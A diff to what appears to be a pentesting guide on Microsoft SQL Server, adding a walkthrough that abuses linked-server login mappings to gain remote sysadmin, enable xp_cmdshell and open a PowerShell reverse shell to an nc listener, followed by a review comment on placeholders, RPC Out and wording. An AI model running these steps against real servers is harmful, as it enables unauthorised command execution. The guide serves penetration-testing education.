diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 1a0cbe475ec..f6cc941317b 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 
@@ -414,6 +414,53 @@ KRB5CCNAME=.ccache mssqlclient.py -no-pass -k ../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md {{#endref}} +#### Linked-server credential mapping -> remote `sysadmin` -> OS RCE + +Linked servers can be configured with a **non-self login mapping** (`Local Login` -> `Remote Login`). In that case, a low-privileged login on the first SQL Server can execute queries on the second one **as the mapped remote principal**. This works the same way even when the linked instance lives in **another domain or forest**. + +First enumerate the links and their mappings: + +```sql +EXEC sp_linkedservers; +EXEC sp_helplinkedsrvlogin ''; +``` + +Then verify which account you become on the remote side and whether it is `sysadmin`: + +```sql +EXEC ('SELECT SYSTEM_USER') AT []; +EXEC ('SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT []; +``` + +If the mapped remote login is `sysadmin`, the linked server becomes a **remote code execution primitive** because you can reconfigure the far-end instance and run OS commands as the **SQL Server service account**: + +```sql +EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT []; +EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT []; +EXEC ('EXEC xp_cmdshell ''whoami''') AT []; +``` + +Using `impacket-mssqlclient`, the same workflow is usually faster: + +```bash +mssqlclient.py -windows-auth /:@ +# Inside the SQL shell: +enum_links +use_link [] +enable_xp_cmdshell +xp_cmdshell whoami +``` + +To upgrade single-command execution into an interactive shell, launch a reverse shell through `xp_cmdshell`: + +```bash +xp_cmdshell powershell -e +rlwrap -cAr nc -lnvp 443 +``` + +> [!TIP] +> If `xp_cmdshell` is disabled, the initial error often confirms that `sp_configure` / `RECONFIGURE` is the intended enablement path. 
Also look for exported policy files such as `Policy_Backup.inf` (`secedit /export` output), because they can expose local rights assignments (`SeImpersonatePrivilege`, `SeDebugPrivilege`, Kerberos skew, SMB signing, NTLM hardening) that help choose the next privilege-escalation step once you land on the SQL host. + ### **Write Files** To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), which requires admin privileges, and then execute some stored procedures to create the file: @@ -731,7 +778,9 @@ You probably will be able to **escalate to Administrator** following one of thes ## References - [Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd](https://unit42.paloaltonetworks.com/phantom-taurus/) +- [HTB: DarkZero - linked-server credential mapping to cross-forest RCE](https://0xdf.gitlab.io/2026/04/04/htb-darkzero.html) - [HTB: Signed - MSSQL coercion to silver ticket sysadmin](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) +- [Microsoft Learn - sp_helplinkedsrvlogin (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-helplinkedsrvlogin-transact-sql) - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users) - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/) - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/) @@ -802,4 +851,3 @@ Entry_3: ``` {{#include ../../banners/hacktricks-training.md}} -
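Review bot: the `EXEC ('...') AT [...]` examples in the new linked-server section assume the link has `RPC Out` enabled, and the hunk never says so; when it is not, every one of those calls (the `SELECT SYSTEM_USER` check, the `sp_configure` / `RECONFIGURE` batch and the `xp_cmdshell` call) fails with "Server '...' is not configured for RPC" and the reader is left without a next step. Add one sentence before the first `EXEC ... AT` block stating the requirement, the check (`SELECT name, is_rpc_out_enabled FROM sys.servers;`) and the fallback that the `SYSTEM_USER` / `IS_SRVROLEMEMBER` probes can still be sent through `OPENQUERY([linked_server], '...')` when RPC Out is off. Second, as rendered the placeholders are empty: `EXEC sp_helplinkedsrvlogin '';`, `AT [];`, `mssqlclient.py -windows-auth /:@` and `xp_cmdshell powershell -e` carry no argument, so none of the commands can be copied as-is; spell the placeholders out (linked server name, `domain/user:password@host`, the base64 payload). Third, the closing TIP is vague ("the initial error often confirms ..."); state the actual message the reader will see, "SQL Server blocked access to procedure 'sys.xp_cmdshell' ... because this component is turned off as part of the security configuration", and that the `sp_configure` batch above is the fix. Finally, the `Policy_Backup.inf` paragraph calls Kerberos skew, SMB signing and NTLM hardening "local rights assignments"; in `secedit /export` output only the `Se*Privilege` entries are under `[Privilege Rights]`, the others are Security Options under `[Registry Values]` / `[System Access]`, and the paragraph itself is about post-landing privilege escalation rather than linked servers, so it reads better under the existing escalation section than wedged between this section and "Write Files".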